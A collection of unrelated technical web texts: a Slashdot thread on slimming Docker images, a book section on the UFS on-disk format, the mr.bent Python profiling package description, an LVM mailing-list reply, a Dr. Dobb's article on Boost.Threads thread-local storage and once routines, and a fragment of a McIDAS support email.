To make Docker work on OSX, you'd have to modify the OS kernel to dramatically change the way it handles system calls and application spaces. Essentially, it groups processes together as if they're running on different kernels, but runs them all in the same kernel. Run a docker container that only runs the command 'ps -e' and it will tell you 'ps' is PID 1. The nginx container So.... thin jails (Score:5, Insightful) iocage create -c Congratulations, you've just (almost) caught up to decade old technology.... [freebsd.dk] Re: (Score:2) This why all the major cloud providers run freebsd. Re: (Score:1) can you also iocage history [docker.com]? docker is to infrastructure what git is to code. Re: (Score:2, Flamebait) docker is to infrastructure what git is to code. No it isn't. You're insulting Git. Docker is to hype what hype is to hype. Re: (Score:2) I've looked at how it works. It looks like you asked a bunch of 20 year olds to re-invent Jails. Just like systemd looks like you asked a bunch of 20 year olds to re-invent init. Re: (Score:2) Why not just run a diff on the jail package file? Re: (Score:1) It's worse, they've combined jails with the equivalent of statically compiled binaries. Bit of a nightmare when there's a vulnerability on a library used in multiple containers. Re: (Score:2, Informative) It's worse, they've combined jails with the equivalent of statically compiled binaries. Bit of a nightmare when there's a vulnerability on a library used in multiple containers. Except it isn't. You store your base images in a docker registry, you update that base image, and then you can have your CI environment kick off rebuilds of any dependent images. And as an added bonus you get to test your exact deployable image, including all dependencies, before you actually roll prod. In the past you needed something akin to a Satellite / Spacewalk setup to be able to lock combinations of versions of packages to a point-in-time snapshot. Most people don't seem to do this. 
They either Re: (Score:1) It is. You've given a best case usage for docker and a worst case for shared libraries. Official repos? (Score:2) Re: (Score:2) C++ isn't a major language? (Score:2) Re: (Score:2) Yes, you always have. But you can statically link it into your binary. Re: (Score:2) C++ isn't web scale (but Perl is, a a apparently). I will never give up (Score:2) > "Less code/less programs in the container means less attack surface..." *fewer Re: (Score:1) Fine. Less code/less programs in the container means fewer attack surface... Re: (Score:2) Re: (Score:3) Re: (Score:2) Re: (Score:2) *surfacer Re: (Score:1) But "less" takes up fewer space, I'm mean less fewer's, I mean, baaah, nevermind Re: (Score:2) some things are correct and some things are incorrect. just cuz you find something more convenient doesn't change this basic fact. facts are facts! Who cares? (not). Maki Re: (Score:2) So you never run half a dozen docker instances from a ram disc? Unfortunately my Mac only has 8Gig RAM, so the size of the Docker Containers does matter. Image sizes (Score:5, Funny) Most people who start using Docker will use Docker's official repositories for their language of choice, but unfortunately if you use them, you'll end up with images the size of the Empire State Building... What's that in Libraries of Congress? Wait what? (Score:1) Indeed (Score:2) I read this yesterday and I found it slightly annoying in the tone. Alpine has been around for awhile, and I don't think anyone using docker for more than experimentation will be happy with massive Ubuntu based images. But would you really use these minimal images packaged by an unknown entity when you can make your own with one line in the dockerfile? Re: (Score:2) Why the heck did you name them butt kernels? Re: (Score:2) Too lazy to read their FAQ? " Why the name? 
If you look up "rump" in a dictionary, you'll find a definition which involves the group that is left over after a portion of the contents of a larger group have been removed -- the classic example is a rump parliament. The attribute "rump" therefore establishes the relationship between just a kernel and a rump kernel." Re: (Score:2) Cool story, but why did they name them butt kernels? There isn't anyone who hears "rump" and thinks "ah yes; the smaller portion left behind after the majority has been removed."
https://developers.slashdot.org/story/16/02/03/221231/new-hack-shrinks-docker-containers
15.2 UFS On-Disk Format

UFS is built around the concept of a disk's geometry, which is described as the number of sectors in a track, the location of the head, and the number of tracks. UFS uses a hybrid block allocation strategy that allocates full blocks or smaller parts of the block called fragments. A block is a set of contiguous fragments starting on a particular boundary. This boundary is determined by the size of a fragment and the number of fragments that constitute a block. For example, fragment 32 and block 32 both relate to the same physical location on disk. Although the next fragment on disk is 33, followed by 34, 35, 36, 37, and so on, the next block is at 40, which begins on fragment 40. This is true in the case of an 8-Kbyte block size and a 1-Kbyte fragment size, where 8 fragments constitute a file system block.

15.2.1 On-Disk UFS Inodes

In UFS, all information pertaining to a file is stored in a special file index node called the inode (except for the name of the file, which is stored in the directory). There are two types of inodes: in-core and on-disk. The on-disk inodes, as the name implies, reside on disk, whereas the in-core inode is created only when a particular file is opened for reading or writing. The on-disk inode is represented by struct icommon. It occupies exactly 128 bytes on disk and can also be found embedded in the in-core inode structure, as shown in Figure 15.1.

Figure 15.1 Embedded On-Disk in In-Core Inode

The structure of icommon looks like this.
struct icommon {
    o_mode_t ic_smode;          /* 0: mode and type of file */
    short ic_nlink;             /* 2: number of links to file */
    o_uid_t ic_suid;            /* 4: owner's user id */
    o_gid_t ic_sgid;            /* 6: owner's group id */
    u_offset_t ic_lsize;        /* 8: number of bytes in file */
#ifdef _KERNEL
    struct timeval32 ic_atime;  /* 16: time last accessed */
    struct timeval32 ic_mtime;  /* 24: time last modified */
    struct timeval32 ic_ctime;  /* 32: last time inode changed */
#else
    time32_t ic_atime;          /* 16: time last accessed */
    int32_t ic_atspare;
    time32_t ic_mtime;          /* 24: time last modified */
    int32_t ic_mtspare;
    time32_t ic_ctime;          /* 32: last time inode changed */
    int32_t ic_ctspare;
#endif
    daddr32_t ic_db[NDADDR];    /* 40: disk block addresses */
    daddr32_t ic_ib[NIADDR];    /* 88: indirect blocks */
    int32_t ic_flags;           /* 100: cflags */
    int32_t ic_blocks;          /* 104: 512 byte blocks actually held */
    int32_t ic_gen;             /* 108: generation number */
    int32_t ic_shadow;          /* 112: shadow inode */
    uid_t ic_uid;               /* 116: long EFT version of uid */
    gid_t ic_gid;               /* 120: long EFT version of gid */
    uint32_t ic_oeftflag;       /* 124: extended attr directory ino, 0 = none */
};

See usr/src/uts/common/sys/fs/ufs_inode.h

Most of the fields are self-explanatory, but a couple of them need a bit of help:

- ic_smode. Indicates the type of inode. The main types are: zero, special node (IFCHR, IFBLK, IFIFO, IFSOCK), symbolic link (IFLNK), directory (IFDIR), regular file (IFREG), and extended metadata inode (IFSHAD, IFATTRDIR). Type zero indicates that the inode is not in use, and ic_nlink should then be zero, unless logging's reclaim_needed flag is set. The special nodes have no data blocks associated with them; they are used for character and block devices, pipes, and sockets. The file type indicates whether this inode is a directory, a regular file, a shadow inode, or an extended attribute directory.
- ic_nlink.
Refers to the number of links to a file, that is, the number of names in the namespace that correspond to a specific file identifier. A regular file has a link count of 1 because only one name in the namespace corresponds to that particular file identifier. A directory link count has the value 2 by default: one is the name of the directory itself, and the other is the "." entry within the directory. Any subdirectory within a directory causes the link count to be incremented by 1 because of the ".." entry. The limit is 32,767; hence, the limit for the number of subdirectories is 32,765, as is the limit on the total number of links. The ".." entry counts against the parent directory only.
- ic_db. Is an array that holds 12 pointers to data blocks. These are called the direct blocks. On a system with a block size of 8192 bytes, or 8 Kbytes, these can accommodate up to 98,304 bytes, or 96 Kbytes. If the file consists entirely of direct blocks, then the last block for the file (not the last ic_db entry) may contain fragments. Note that if the file size exceeds the capacity of the ic_db array, then the block list for the file must consist entirely of full-sized file system blocks.
- ic_ib. Is a small array of only three pointers, but it allows a file to grow to terabytes in size. How does this work? Well, the first entry in ic_ib points to a block that stores 2048 block addresses. A file with a single indirect block can accommodate up to 8192 * (12 + 2048) bytes, or about 16 Mbytes. If more storage is required, another level of indirection is added and the second indirect block is used. The second entry in ic_ib points to 2048 block addresses, and each of those 2048 entries points to another block containing 2048 entries that finally point to the data blocks. With two levels of indirection, a file can accommodate up to 8192 * (12 + 2048 + (2048 * 2048)) bytes, or about 32 Gbytes.
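These capacities follow directly from the pointer arithmetic; here is a quick sketch, assuming the 8-Kbyte block size and the 4-byte daddr32_t disk addresses used above:

```python
# Maximum file sizes reachable through the UFS block pointers, assuming
# 8 KB blocks and 4-byte (daddr32_t) disk addresses, as in the text.
BLOCK_SIZE = 8192
NDADDR = 12                  # direct pointers in ic_db
PTRS = BLOCK_SIZE // 4       # 2048 addresses per indirect block

direct = NDADDR
single = direct + PTRS       # one level of indirection
double = single + PTRS ** 2  # two levels
triple = double + PTRS ** 3  # three levels

print(direct * BLOCK_SIZE)   # 98304 bytes (96 KB)
print(single * BLOCK_SIZE)   # 16875520 bytes (~16 MB)
print(double * BLOCK_SIZE)   # 34376613888 bytes (~32 GB)
print(triple * BLOCK_SIZE)   # 70403120791552 bytes (64 TB)
```

Each additional level of indirection multiplies the reachable block count by 2048, which is why the jump from one level to the next is roughly three orders of magnitude.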
A third level of indirection permits the file to be 8192 * (12 + 2048 + (2048 * 2048) + (2048 * 2048 * 2048)) = 70,403,120,791,552 bytes long or—yes, you guessed it—64 Tbytes! However, since all addresses must be addressable as fragments, that is, a 31-bit count, the maximum is 2 Tbytes (2^31 * 1 Kbyte). Multi-terabyte UFS (MTBUFS) enables 16-Tbyte file system sizes by enforcing a minimum fragment size of 8 Kbytes, which gives you 2^31 * 8 Kbytes, or 16 Tbytes. Figure 15.2 illustrates the layout.

Figure 15.2 UFS Block Layout

- ic_shadow. If non-zero, contains the number of an inode providing shadow metadata (usually, this data would be ACLs).
- ic_oeftflag. If non-zero, contains the number of an inode of type IFATTRDIR, which is a directory containing extended attribute files.

15.2.2 UFS Directories

The file name information and hierarchy information that constitute the directory structure of UFS are stored in directories. Each directory stores a list of file names and the inode number for each file; this information (stored in struct direct) allows the directory structure to relate file names to real disk files. The directory itself is stored in a file as a series of chunks, which are groups of the directory entries. Earlier file systems like the System V file system had a fixed directory record length, which meant that a lot of space would be wasted if provision was made for long file names. In UFS, each directory entry can be of variable length, thus providing a mechanism for long file names without a lot of wasted space. UFS file names can be up to 255 characters long. The group of directory chunks that constitute a directory is stored as a special type of file. The notion of a directory as a type of file allows UFS to implement a hierarchical directory structure: Directories can contain files that are directories. For example, the root directory has a name, "/", and an inode number, 2, which holds a chunk of directory entries holding a number of files and directories.
One of these directory entries, named etc, is another directory containing more files and directories. For traversal up and down the file system, the chdir system call opens the directory file in question and then sets the current working directory to point to the new directory file. Figure 15.3 illustrates the directory hierarchy.

Figure 15.3 UNIX Directory Hierarchy

Each directory contains two special files. The file named "." is a link to the directory itself; the file named ".." is a link to the parent directory. Thus, a change of directory to .. leads to the parent directory. Now let's switch gears and see what the on-disk structures for directories look like. The contents of a directory are broken up into DIRBLKSIZ chunks, also known as dirblks. Each of these contains one or more direct structures. DIRBLKSIZ was chosen to be the same as the size of a disk sector so that modifications to directory entries could be done atomically, on the assumption that a sector write either completes successfully or fails (which can no longer be guaranteed with the advancement of cached hard drives). Each directory entry is stored in a structure called direct that contains the inode number (d_ino), the length of the entry (d_reclen), the length of the name (d_namlen), and a null-terminated string for the name itself (d_name).

#define DIRBLKSIZ DEV_BSIZE
#define MAXNAMLEN 255

struct direct {
    uint32_t d_ino;              /* inode number of entry */
    ushort_t d_reclen;           /* length of this record */
    ushort_t d_namlen;           /* length of string in d_name */
    char d_name[MAXNAMLEN + 1];  /* name must be no longer than this */
};

See usr/src/uts/common/sys/fs/ufs_fsdir.h

d_reclen includes the space consumed by all the fields in a directory entry, including d_name's trailing null character.
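A minimal decoder for this on-disk layout can be sketched as follows. This is illustrative only: the big-endian byte order (as on SPARC) and the sample inode number are assumptions, and real entries are padded out per d_reclen.

```python
import struct

# Hypothetical decoder for the struct direct layout above: a 32-bit inode
# number, a 16-bit record length, a 16-bit name length, then the name
# bytes. Big-endian byte order and the sample values are assumptions.
def parse_direct(buf, offset=0):
    d_ino, d_reclen, d_namlen = struct.unpack_from(">IHH", buf, offset)
    name = buf[offset + 8 : offset + 8 + d_namlen].decode("ascii")
    return d_ino, d_reclen, d_namlen, name

# Pack one entry for an "etc" directory (invented inode number): 8 bytes
# of fixed header plus the name and its trailing NUL give d_reclen = 12.
entry = struct.pack(">IHH", 1423, 12, 3) + b"etc\x00"
print(parse_direct(entry))  # (1423, 12, 3, 'etc')
```

Since d_reclen covers the whole record, walking a dirblk is just a matter of advancing the offset by d_reclen until the chunk is exhausted.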
This facilitates directory entry deletion because when an entry is deleted, if it is not the first entry in the current directory block, the entry before it is grown to include the deleted one; that is, its d_reclen is incremented to account for the size of the deleted entry. The procedure is relatively inexpensive and helps keep internal fragmentation down. Figure 15.4 illustrates the concept of directory deletion.

Figure 15.4 Deletion of a Directory Entry

15.2.3 UFS Hard Links

There is one inode for each file on disk; however, with hard links, each file can have multiple file names. With hard links, file names in multiple directories point to the same on-disk inode. The inode reference count field reflects the number of hard links to the inode. Figure 15.5 illustrates inode 1423 describing a file; two separate directory entries with different names both point to the same inode number. Note that the reference count, refcnt, has been incremented to 2.

Figure 15.5 UFS Links

15.2.4 Shadow Inodes

UFS allows storage of additional per-inode data through the use of shadow inodes. The implementation of a shadow inode is generic enough to permit storage of any arbitrary data. All that is needed are a tag to identify the data and functions to convert the appropriate data structures from on-disk to in-core, and vice versa. As of this writing (2005), only two data types are defined: FSD_ACL for identification of ACLs and FSD_DFACL for default ACLs. Only one shadow inode is permitted per inode today, and as a result both ACLs and default ACLs are stored in the same shadow inode.

typedef struct ufs_fsd {
    int fsd_type;     /* type of data */
    int fsd_size;     /* size in bytes of ufs_fsd and data */
    char fsd_data[1]; /* data */
} ufs_fsd_t;

See usr/src/uts/common/sys/fs/ufs_acl.h

The way a shadow inode is laid out on disk is quite simple (see Figure 15.6). All the entries for the shadow inode contain one header that includes the type of data and the length of the whole record, data + header.
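That header-plus-data framing can be sketched as follows. This is an illustrative model of the ufs_fsd record shape, not the kernel's code: the numeric type values are invented, and the real implementation rounds record sizes up for alignment.

```python
import struct

# Sketch of the ufs_fsd framing: each record is a 4-byte type, a 4-byte
# total size (header + data), then the data; records are concatenated.
# The type values here are invented for illustration.
FSD_ACL = 1
FSD_DFACL = 2

def pack_fsd(fsd_type, data):
    size = 8 + len(data)  # two 4-byte header ints plus the payload
    return struct.pack("<ii", fsd_type, size) + data

def unpack_fsds(buf):
    records, off = [], 0
    while off < len(buf):
        fsd_type, size = struct.unpack_from("<ii", buf, off)
        records.append((fsd_type, buf[off + 8 : off + size]))
        off += size  # fsd_size covers the whole record, so it is the stride
    return records

blob = pack_fsd(FSD_ACL, b"acl-bytes") + pack_fsd(FSD_DFACL, b"dfacl")
print(unpack_fsds(blob))  # [(1, b'acl-bytes'), (2, b'dfacl')]
```

Because fsd_size covers the whole record, the reader never needs to know the payload formats to skip over record types it does not understand.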
Entries are then simply concatenated and stored to disk as a separate inode with the inode's ic_smode set to ISHAD. The parent's ic_shadow is then updated to point to this shadow inode.

Figure 15.6 On-Disk Shadow Inode Layout

15.2.5 The Boot Block

Figure 15.7 illustrates the UFS layout discussed in this section. At the start of the file system is the boot block. This is a spare sector reserved for the boot program when UFS is used as a root file system. At boot time, the boot firmware loads the first sector from the boot device and then starts executing code residing in that block. The firmware boot is file system independent, which means that the boot firmware has no knowledge of the file system. We rely on code in the file system boot block to mount the root file system. When the system starts, the UFS boot block is loaded and executed, which, in turn, mounts the UFS root file system. The boot program then passes control to a larger kernel loader, in /platform/sun4[mud]/ufsboot, to load the UNIX kernel.

Figure 15.7 UFS Layout

The boot program is loaded onto the first sector of the file system at install time with the installboot(1M) command. The 512-byte install boot image resides in /usr/platform/sun4[mud]/lib/fs/ufs/bootblk in the platform-dependent directories.

15.2.6 The Superblock

The superblock contains all the information about the geometry and layout of the file system and is critical to the file system state. As a safety precaution, the superblock is replicated across the file system with each cylinder group so that the file system is not crippled if the superblock becomes corrupted. It is initially created by mkfs and updated by tunefs and mkfs (in case a file system is grown). The primary superblock starts at an offset of 8192 bytes into the partition slice and occupies one file system block (usually 8192 bytes, but can be 4096 bytes on x86 architectures).
The superblock contains a variety of information, including the location of each cylinder group and a summary list of available free blocks. The major information in the superblock that identifies the file system geometry is listed below.

- fs_sblkno. Address of superblock in file system; defaults to block number 16.
- fs_cblkno. Offset of the first cylinder block in the file system.
- fs_iblkno. Offset of the first inode blocks in the file system.
- fs_dblkno. Offset of the first data blocks after the first cylinder group.
- fs_cgoffset. Cylinder group offset in the cylinder.
- fs_cgmask. Mask to obtain physical starting fragment number of the cylinder group.
- fs_time. Last time written.
- fs_size. Number of blocks in the file system.
- fs_dsize. Number of data blocks in the file system.
- fs_ncg. Number of cylinder groups.
- fs_cpg. Number of cylinders in a cylinder group.
- fs_ipg. Number of inodes in a cylinder group.
- fs_fpg. Number of fragments (including metadata) in a cylinder group.
- fs_bsize. Size of basic blocks in the file system.
- fs_fsize. Size of fragmented blocks in the file system.
- fs_frag. Number of fragments in a block in the file system.
- fs_magic. A magic number to validate the superblock.

The file system configuration parameters also reside in the superblock. These include some of the following, which are configured at the time the file system is constructed. You can tune the parameters later with the tunefs command.

- fs_minfree. Minimum percentage of free blocks.
- fs_rotdelay. Number of milliseconds of rotational delay between sequential blocks. The rotational delay was used to implement block interleaving when the operating system could not keep up with reading contiguous blocks. Since this is no longer an issue, fs_rotdelay defaults to zero.
- fs_rps. Disk revolutions per second.
- fs_maxcontig. Maximum number of contiguous blocks; controls the number of read-ahead blocks.
- fs_maxbpg.
Maximum number of data blocks per cylinder group.
- fs_optim. Optimization preference: space or time.

And here are the significant logging-related fields in the superblock:

- fs_rolled. Determines whether any data in the log still needs to be rolled back to the file system.
- fs_si. Indicates whether the logging summary information is up to date or whether it needs to be recalculated from the cylinder groups.
- fs_clean. Is set to FS_LOG for a logging file system.
- fs_logbno. Is the disk block number of the logging metadata.
- fs_reclaim. Is set to indicate whether the reclaim thread is running or needs to be run.

See struct fs in usr/src/uts/common/sys/fs/ufs_fs.h for the complete superblock structure definition.

15.2.7 The Cylinder Group

The cylinder group is made up of several logically distinct parts. At logical offset zero into the cylinder group is a backup copy of the file system's superblock. Following that, we have the cylinder group structure, the blktot array (indicating how many full blocks are available), the blks array (representing the full-sized blocks that are free in each rotational position), the inode bitmap (marking which inodes are in use), and finally, the bitmap of which fragments are free. Next in the layout is the array of inodes, whose size varies according to the number of inodes in a cylinder group (on-disk inode size is restricted to 128 bytes). And finally, the rest of the cylinder group is filled by the data blocks. Figure 15.8 illustrates the layout.

Figure 15.8 Logical Layout of a Cylinder Group

The last cylinder group in a file system may be incomplete because the number of cylinders in a disk drive usually does not divide evenly into cylinder groups. In this case, we simply reduce the number of data blocks available in the last cylinder group; however, the metadata portion of the cylinder group stays the same throughout the file system.
The cg_ncyl and cg_ndblk fields of the cylinder group structure guide us to the size so that we don't accidentally go out of bounds.

/*
 * Cylinder group block for a file system.
 *
 * Writable fields in the cylinder group are protected by the associated
 * super block lock fs->fs_lock.
 */
#define CG_MAGIC 0x090255

struct cg {
    uint32_t cg_link;           /* NOT USED linked list of cyl groups */
    int32_t cg_magic;           /* magic number */
    time32_t cg_time;           /* time last written */
    int32_t cg_cgx;             /* we are the cgx'th cylinder group */
    short cg_ncyl;              /* number of cyl's this cg */
    short cg_niblk;             /* number of inode blocks this cg */
    int32_t cg_ndblk;           /* number of data blocks this cg */
    struct csum cg_cs;          /* cylinder summary information */
    int32_t cg_rotor;           /* position of last used block */
    int32_t cg_frotor;          /* position of last used frag */
    int32_t cg_irotor;          /* position of last used inode */
    int32_t cg_frsum[MAXFRAG];  /* counts of available frags */
    int32_t cg_btotoff;         /* (int32_t) block totals per cylinder */
    int32_t cg_boff;            /* (short) free block positions */
    int32_t cg_iusedoff;        /* (char) used inode map */
    int32_t cg_freeoff;         /* (uchar_t) free block map */
    int32_t cg_nextfreeoff;     /* (uchar_t) next available space */
    int32_t cg_sparecon[16];    /* reserved for future use */
    uchar_t cg_space[1];        /* space for cylinder group maps */
                                /* actually longer */
};

See usr/src/uts/common/sys/fs/ufs_fs.h

15.2.8 Summary of UFS Architecture

Figure 15.9 puts it all together.

Figure 15.9 The UFS File System
http://www.informit.com/articles/article.aspx?p=605371&seqNum=2
A fussy little man in impeccable black jacket and pinstripe trousers.

Mr Bent is a framework for allowing profile data to be collected in a Python application and viewed at different logical levels. The three concepts involved are a plugin (a piece of code that profiles an application), a context (a logical block of code for which you want reporting data), and a filter (a way of getting fine-grained information on where the results for a context came from).

Plugins are callables that are given to the 'mkwrapper' function, which applies it to a function in your application. This looks like:

    mr.bent.wrapper.mkwrapper(foo.bar, plugincallable, "myplugin")

This will cause 'plugincallable' to be called on every invocation of 'foo.bar' and add the results of the plugin to the current context as 'myplugin'. Plugins can return either a number or an iterable. If a plugin returns an iterable, it must contain either strings or numbers. Returning a number is considered equivalent to returning an iterable of numbers of length 1.

A context stores data generated by plugins. At any point a new context can be started, which will be a "sub-context" of the currently active context. If there is no currently active context, a new top-level one will be created. Contexts are named with the dotted name of the function that they are created around, and return their data to a callback. This looks like:

    def mycallback(context, result, stats):
        return "%s <!-- %s -->" % (result, `stats`)

    mr.bent.wrapper.mkcontext(bar.foo, mycallback)

This example would cause invocations of bar.foo, a function that returns XML, to return the XML with a repr of the context dict in a following comment.

When a context ends, it returns a mapping of the data it collected. As contexts are nested, parent contexts each include the data of their sub-contexts. Hence, the top-level context returns the overall profiling; there is no need to manually aggregate data.

A filter is, like most things in Mr.
Bent, a wrapper around a function. This will default to the dotted name of the callable, but an alternative, application-specific name can be used instead. This is especially useful for a function that is used to render multiple different logical blocks of content. This looks like:

    mr.bent.wrapper.mkfilter(take.me.to.the.foo.bar)

In this example we have an application that renders a page of HTML including fragments that are logically different files, which are then included into the main page.

Example 1:

    Top level
    ├── Left hand column
    │   ├── Login box
    │   └── Navigation box
    ├── Content block
    └── Right hand column
        └── Calendar box

In this system we have the following notional plugins (with short names for brevity). The return values may look something like this:

    {'t': [5, 15, 85, 25], 'd': [0, 1, 2, 8]}

    Top level                  {'t': [5, 15, 85, 25], 'd': [0, 1, 2, 8]}
    ├── Left hand column       {'t': [5, 15], 'd': [0, 1]}
    │   ├── Login box          {'t': [5], 'd': [0]}
    │   └── Navigation box     {'t': [15], 'd': [1]}
    ├── Content block          {'t': [85], 'd': [2]}
    └── Right hand column      {'t': [25], 'd': [8]}
        └── Calendar box       {'t': [25], 'd': [8]}

Hence, the user has data at each level he has defined, which he can then process as he likes.
Let's see that again as a doctest (sorry Florian!):

    >>> from mr.bent.mavolio import create, destroy, current
    >>> create("top")         # Create the top level context
    >>> create("lefthand")    # Create the left hand column
    >>> create("login")       # and the login portlet
    >>> current()             # show that it's an empty context
    {}
    >>> current()['t'] = [5]  # Simulate plugin results being added to context
    >>> current()['d'] = [0]
    >>> destroy()             # Leave context
    {'t': [5], 'd': [0]}
    >>> create("nav")         # Create nav
    >>> current()['t'] = [15]
    >>> current()['d'] = [1]
    >>> destroy()             # Leave nav
    {'t': [15], 'd': [1]}
    >>> destroy()             # Leave left hand column
    {'t': [5, 15], 'd': [0, 1]}
    >>> create("content")     # Enter content block
    >>> current()['t'] = [85]
    >>> current()['d'] = [2]
    >>> destroy()             # Leave content block
    {'t': [85], 'd': [2]}
    >>> create("righthand")   # Enter right hand column
    >>> create("cal")         # Enter calendar box
    >>> current()['t'] = [25]
    >>> current()['d'] = [8]
    >>> destroy()             # Leave calendar
    {'t': [25], 'd': [8]}
    >>> destroy()             # Leave right hand column
    {'t': [25], 'd': [8]}
    >>> destroy()             # Leave the top level context, get totals
    {'t': [5, 15, 85, 25], 'd': [0, 1, 2, 8]}

Utility Methods

Low level.
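The create/destroy/current calls in the doctest come from mr.bent.mavolio. As an illustration of the aggregation semantics the doctest demonstrates (child data folding into the parent on destroy), here is a tiny reimplementation sketch; this is my own guess at the mechanics, not mr.bent's actual code:

```python
_stack = []

def create(name):
    """Enter a new (sub-)context."""
    _stack.append({"name": name, "data": {}})

def current():
    """Return the data dict of the innermost active context."""
    return _stack[-1]["data"]

def destroy():
    """Leave the innermost context, folding its data into the parent."""
    ctx = _stack.pop()
    if _stack:  # fold results upward so the top level sees everything
        parent = _stack[-1]["data"]
        for key, values in ctx["data"].items():
            parent.setdefault(key, []).extend(values)
    return ctx["data"]

# A shortened replay of the doctest above:
create("top")
create("login")
current()["t"] = [5]
assert destroy() == {"t": [5]}
create("nav")
current()["t"] = [15]
assert destroy() == {"t": [15]}
assert destroy() == {"t": [5, 15]}  # top level aggregated both boxes
```

The only interesting design point is that destroy both reports a context's own totals and merges them into the parent, which is what makes manual aggregation unnecessary.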
https://pypi.org/project/mr.bent/
>>>>> "Andreas" == Andreas Dilger <adilger turbolabs com> writes:

Andreas> :-
Andreas> It was just added recently (probably a devfs thing).
Andreas> Before that, it just ran the "lvm_fs_setup()" (or
Andreas> whatever) function, and didn't do anything with the
Andreas> output.

Hmm, that means my suggestion may be broken.

Andreas> Need something like:
Andreas> #if LINUX_KERNEL_VERSION > KERNEL_VERSION (2, 3, 38)
Andreas> foo.de =
Andreas> #endif
Andreas> lvm_fs_setup();

Great, thanks for the help. I'll have a look at the weekend. If anyone else with troubles wants to beat me to it, be my guest :-)

Sincerely,

Adrian Phillips

--
Your mouse has moved. Windows NT must be restarted for the change to take effect. Reboot now? [OK]
https://www.redhat.com/archives/linux-lvm/2001-October/msg00127.html
Thread Local Storage

Many functions are not implemented to be reentrant. This means that it is unsafe to call the function while another thread is calling the same function. A non-reentrant function holds static data over successive calls or returns a pointer to static data. For example, std::strtok is not reentrant because it uses static data to hold the string to be broken into tokens.

A non-reentrant function can be made into a reentrant function using two approaches. One approach is to change the interface so that the function takes a pointer or reference to a data type that can be used in place of the static data previously used. For example, POSIX defines strtok_r, a reentrant variant of std::strtok, which takes an extra char** parameter that's used instead of static data. This solution is simple and gives the best possible performance; however, it means changing the public interface, which potentially means changing a lot of code.

The other approach leaves the public interface as is and replaces the static data with thread local storage (sometimes referred to as thread-specific storage). Thread local storage is data that's associated with a specific thread (the current thread). Multithreading libraries give access to thread local storage through an interface that allows access to the current thread's instance of the data. Every thread gets its own instance of this data, so there's never an issue with concurrent access. However, access to thread local storage is slower than access to static or local data; therefore it's not always the best solution. It is, though, the only solution available when it's essential not to change the public interface.

Boost.Threads provides access to thread local storage through the smart pointer boost::thread_specific_ptr. The first time every thread tries to access an instance of this smart pointer, it has a NULL value, so code should be written to check for this and initialize the pointer on first use.
The Boost.Threads library ensures that the data stored in thread local storage is cleaned up when the thread exits.

Listing Five illustrates a very simple use of the boost::thread_specific_ptr class. Two new threads are created to initialize the thread local storage and then loop 10 times, incrementing the integer contained in the smart pointer and writing the result to std::cout (which is synchronized with a mutex because it is a shared resource). The main thread then waits for these two threads to complete. The output of this example clearly shows that each thread is operating on its own instance of data, even though both are using the same boost::thread_specific_ptr.

Listing Five: The boost::thread_specific_ptr class.

    #include <boost/thread/thread.hpp>
    #include <boost/thread/mutex.hpp>
    #include <boost/thread/tss.hpp>
    #include <iostream>

    boost::mutex io_mutex;
    boost::thread_specific_ptr<int> ptr;

    struct count
    {
        count(int id) : id(id) { }

        void operator()()
        {
            if (ptr.get() == 0)
                ptr.reset(new int(0));

            for (int i = 0; i < 10; ++i)
            {
                (*ptr)++;
                boost::mutex::scoped_lock lock(io_mutex);
                std::cout << id << ": " << *ptr << std::endl;
            }
        }

        int id;
    };

    int main(int argc, char* argv[])
    {
        boost::thread thrd1(count(1));
        boost::thread thrd2(count(2));
        thrd1.join();
        thrd2.join();
        return 0;
    }

Once Routines

There's one issue left to deal with: how to make initialization routines (such as constructors) thread-safe. For example, when a global instance of an object is created as a singleton for an application, knowing that there's an issue with the order of instantiation, a function is used that returns a static instance, ensuring the static instance is created the first time the method is called. The problem here is that if multiple threads call this function at the same time, the constructor for the static instance may be called multiple times as well, with disastrous results. The solution to this problem is what's known as a once routine.
A once routine is called only once by an application. If multiple threads try to call the routine at the same time, only one actually is able to do so, while all others wait until that thread has finished executing the routine. To ensure that it is executed only once, the routine is called indirectly by another function that's passed a pointer to the routine and a reference to a special flag type used to check if the routine has been called yet. This flag is initialized using static initialization, which ensures that it is initialized at compile time and not run time. Therefore, it is not subject to multithreaded initialization problems.

Boost.Threads provides calling once routines through boost::call_once and also defines the flag type boost::once_flag and a special macro used to statically initialize the flag, named BOOST_ONCE_INIT.

Listing Six illustrates a very simple use of boost::call_once. A global integer is statically initialized to zero, and an instance of boost::once_flag is statically initialized using BOOST_ONCE_INIT. Then main starts two threads, both trying to initialize the global integer by calling boost::call_once with a pointer to a function that increments the integer. main waits for these two threads to complete and writes out the final value of the integer to std::cout. The output illustrates that the routine truly was only called once, because the value of the integer is only one.

Listing Six: A very simple use of boost::call_once.

    #include <boost/thread/thread.hpp>
    #include <boost/thread/once.hpp>
    #include <iostream>

    int i = 0;
    boost::once_flag flag = BOOST_ONCE_INIT;

    void init()
    {
        ++i;
    }

    void thread()
    {
        boost::call_once(&init, flag);
    }

    int main(int argc, char* argv[])
    {
        boost::thread thrd1(&thread);
        boost::thread thrd2(&thread);
        thrd1.join();
        thrd2.join();
        std::cout << i << std::endl;
        return 0;
    }

The Future of Boost.Threads

There are several additional features planned for Boost.Threads.
Boost.Threads has been presented to the C++ Standards Committee's Library Working Group for possible inclusion in the Standard's upcoming Library Technical Report, as a prelude to inclusion in the next version of the Standard. The committee may consider other threading libraries; however, they viewed the initial presentation of Boost.Threads favorably, and they are very interested in adding some support for multithreaded programming to the Standard. So, the future is looking good for multithreaded programming in C++.

References

[1] The POSIX standard defines multithreaded support in what's commonly known as the pthread library. This provides multithreaded support for a wide range of operating systems, including Win32 through the pthreads-win32 port. However, this is a C library that fails to address some C++ concepts and is not available on all platforms.

[2] Visit the Boost website at.

[3] See Bjorn Karlsson's article, "Smart Pointers in Boost," C/C++ Users Journal, April 2002.

[4] Douglas Schmidt, Michael Stal, Hans Rohnert, and Frank Buschmann. Pattern-Oriented Software Architecture Volume 2: Patterns for Concurrent and Networked Objects (Wiley, 2000).

William E. Kempf received his BS in CompSci/Math from Doane College. He's been in the industry for 10 years and is currently a senior application developer for First Data Resources, Inc. He is the author of the Boost.Threads library and an active Boost member. He can be contacted at wekempf@cox.net.
http://www.drdobbs.com/cpp/the-boostthreads-library/184401518?pgno=4
>From: "Dan A. Dansereau" <address@hidden>
>Organization: Utah State University
>Keywords: 200203141936.g2EJa6a06867 McIDAS DEC OSF/1

Dan,

re:
>I have regenerate a new op system, ldm, and mcidas
>anyway before I started "fixing it" I thought you could
>look at it,

Things seem to be working correctly on tornado:

o the LDM is ingesting and decoding IMAGE, POINT, GRID and TEXT data from allegan
